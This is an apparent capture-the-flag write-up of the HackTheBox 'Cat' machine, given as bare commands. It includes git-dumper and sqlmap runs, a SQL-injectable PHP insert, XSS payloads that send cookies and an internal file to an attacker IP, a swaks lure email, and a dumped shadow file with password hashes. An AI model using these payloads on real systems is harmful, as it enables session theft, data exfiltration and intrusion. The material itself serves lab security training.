nmap -A -v -T4 10.10.11.53
https://github.com/arthaud/git-dumper.git
python3 git_dumper.py http://cat.htb/.git/ ./gitikun
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
<script>fetch('http://10.10.14.99/?c='+document.cookie);</script>
sqlmap -r req --risk3--level5--batch--dbms
sqlmap -r req --risk 3 --level 5 --batch --dbms=sqlite --dump --threads 10 -T users --dump
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.99:8000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>
swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link" --body "http://localhost:3000/axel/ikun" --server localhost --port 25 --timeout 30s
root:$6$gZWufTq2.hEhrNx3$9xZG.3MLpfYOJo8EN24H5CoT5sJ24F7vWeky5tU4QTZ1sVKwngFUxfbAqlorjEP.aliWJZA7jS3Bxnc5HvKiH1:19994:0:99999:7:::
daemon:*:19926:0:99999:7:::
bin:*:19926:0:99999:7:::
sys:*:19926:0:99999:7:::
sync:*:19926:0:99999:7:::
games:*:19926:0:99999:7:::
man:*:19926:0:99999:7:::
lp:*:19926:0:99999:7:::
mail:*:19926:0:99999:7:::
news:*:19926:0:99999:7:::
uucp:*:19926:0:99999:7:::
proxy:*:19926:0:99999:7:::
www-data:*:19926:0:99999:7:::
backup:*:19926:0:99999:7:::
list:*:19926:0:99999:7:::
irc:*:19926:0:99999:7:::
gnats:*:19926:0:99999:7:::
nobody:*:19926:0:99999:7:::
systemd-network:*:19926:0:99999:7:::
systemd-resolve:*:19926:0:99999:7:::
systemd-timesync:*:19926:0:99999:7:::
messagebus:*:19926:0:99999:7:::
syslog:*:19430:0:99999:7:::
_apt:*:19430:0:99999:7:::
tss:*:19430:0:99999:7:::
uuidd:*:19430:0:99999:7:::
tcpdump:*:19430:0:99999:7:::
landscape:*:19430:0:99999:7:::
pollinate:*:19430:0:99999:7:::
fwupd-refresh:*:19430:0:99999:7:::
usbmux:*:19877:0:99999:7:::
systemd-coredump:!!:19926::::::
axel:$6$Qin7PtKZAmITZJvt$dNoqvN0S7anYjIHW6nwrene2XI1vBCg49koRHVpnJlCYdDn75QLsL.5CStdukiXRejTMKaHSbckmlCfaf47jn1:19882:0:99999:7:::
sshd:*:19926:0:99999:7:::
rosa:$6$Gcl0Zhl7CRxJqHRi$CG7HwjG/OoMBS3hnrs9m6.Wgs.CxQ.xFNqI2VTN/xMZifc06kxRUh6xgS1/wIrhObeLnqcYDTQlFi2lN0eyXS/:19966:0:99999:7:::
git:*:19964:0:99999:7:::
smmta:*:19965:0:99999:7:::
smmsp:*:19965:0:99999:7:::
jobert:$6$AYGcjhL4z59iTO0E$degFih9k1URjYwU7lMH3YKIXQEL5DfU1y833UEItzgQJgmBBsv55SW.R6EAMFUKegShaWmCPAlNfGhPxvLqW6.:19965:0:99999:7:::
_laurel:!:20109::::::
原文始发于微信公众号(Jiyou too beautiful):HTB-Cat
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论